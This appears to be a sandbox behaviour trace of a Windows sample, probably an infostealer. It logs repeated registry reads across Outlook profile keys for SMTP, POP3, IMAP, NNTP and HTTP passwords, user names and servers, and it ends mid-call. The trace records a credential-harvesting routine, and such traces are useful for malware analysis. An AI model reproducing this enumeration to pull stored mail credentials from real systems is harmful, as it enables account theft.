[0249.194] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.194] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.194] RegCloseKey (hKey=0x95c) returned 0x0 [0249.194] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.194] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.194] RegCloseKey (hKey=0x95c) returned 0x0 [0249.194] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.194] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.194] RegCloseKey (hKey=0x95c) returned 0x0 [0249.194] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.194] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.194] RegCloseKey (hKey=0x95c) returned 0x0 [0249.194] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", phkResult=0x1c4e6a0 | out: phkResult=0x1c4e6a0*=0x95c) returned 0x0 [0249.194] RegEnumKeyExA (in: hKey=0x95c, dwIndex=0x0, lpName=0x1c4e6b0, lpcchName=0x1c4eed8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1c4eed8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0249.194] RegCloseKey (hKey=0x95c) returned 0x0 [0249.195] LocalFree (hMem=0x5d68100) returned 0x0 [0249.195] RegEnumKeyExA (in: hKey=0x94c, dwIndex=0x6, lpName=0x1c4ef10, lpcchName=0x1c4f738, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="626dbd3f36ef4b4b9263a867695919ec", lpcchName=0x1c4f738, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0249.195] lstrlenA (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0249.195] LocalAlloc (uFlags=0x40, uBytes=0xd7) returned 0x5d67060 [0249.195] wsprintfA (in: param_1=0x5d67060, param_2="%s\\%s" | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec") returned 88 [0249.195] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.195] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.195] RegCloseKey (hKey=0x95c) returned 0x0 [0249.195] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.195] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.195] RegCloseKey (hKey=0x95c) returned 0x0 [0249.195] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.196] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.196] RegCloseKey (hKey=0x95c) returned 0x0 [0249.196] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.196] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.196] RegCloseKey (hKey=0x95c) returned 0x0 [0249.196] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.196] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.196] RegCloseKey (hKey=0x95c) returned 0x0 [0249.196] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.196] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.196] RegCloseKey (hKey=0x95c) returned 0x0 [0249.196] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.196] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.196] RegCloseKey (hKey=0x95c) returned 0x0 [0249.196] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.196] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.196] RegCloseKey (hKey=0x95c) returned 0x0 [0249.196] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.196] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.196] RegCloseKey (hKey=0x95c) returned 0x0 [0249.197] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.197] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.197] RegCloseKey (hKey=0x95c) returned 0x0 [0249.197] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.197] RegQueryValueExA (in: hKey=0x95c, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.197] RegCloseKey (hKey=0x95c) returned 0x0 [0249.197] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.197] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.197] RegCloseKey (hKey=0x95c) returned 0x0 [0249.197] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.197] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.197] RegCloseKey (hKey=0x95c) returned 0x0 [0249.197] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.197] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.197] RegCloseKey (hKey=0x95c) returned 0x0 [0249.197] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.197] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.197] RegCloseKey (hKey=0x95c) returned 0x0 [0249.197] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.198] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.198] RegCloseKey (hKey=0x95c) returned 0x0 [0249.198] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.198] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.198] RegCloseKey (hKey=0x95c) returned 0x0 [0249.198] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.198] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.198] RegCloseKey (hKey=0x95c) returned 0x0 [0249.198] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.198] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.198] RegCloseKey (hKey=0x95c) returned 0x0 [0249.198] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.198] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.198] RegCloseKey (hKey=0x95c) returned 0x0 [0249.198] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.198] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.198] RegCloseKey (hKey=0x95c) returned 0x0 [0249.198] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.198] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.198] RegCloseKey (hKey=0x95c) returned 0x0 [0249.199] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.199] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.199] RegCloseKey (hKey=0x95c) returned 0x0 [0249.199] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.199] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.199] RegCloseKey (hKey=0x95c) returned 0x0 [0249.199] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.199] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.199] RegCloseKey (hKey=0x95c) returned 0x0 [0249.199] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.199] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.199] RegCloseKey (hKey=0x95c) returned 0x0 [0249.199] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.199] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.199] RegCloseKey (hKey=0x95c) returned 0x0 [0249.199] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.199] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.199] RegCloseKey (hKey=0x95c) returned 0x0 [0249.199] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.199] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.200] RegCloseKey (hKey=0x95c) returned 0x0 [0249.200] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.200] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.200] RegCloseKey (hKey=0x95c) returned 0x0 [0249.200] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.200] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.200] RegCloseKey (hKey=0x95c) returned 0x0 [0249.200] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.200] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.200] RegCloseKey (hKey=0x95c) returned 0x0 [0249.200] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.200] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.200] RegCloseKey (hKey=0x95c) returned 0x0 [0249.200] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.200] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.200] RegCloseKey (hKey=0x95c) returned 0x0 [0249.200] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.200] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.200] RegCloseKey (hKey=0x95c) returned 0x0 [0249.200] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.201] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.201] RegCloseKey (hKey=0x95c) returned 0x0 [0249.201] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.201] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.201] RegCloseKey (hKey=0x95c) returned 0x0 [0249.201] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.201] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.201] RegCloseKey (hKey=0x95c) returned 0x0 [0249.201] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.201] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.201] RegCloseKey (hKey=0x95c) returned 0x0 [0249.201] RegOpenKeyExA (in: hKey=0xffffffff80000001, 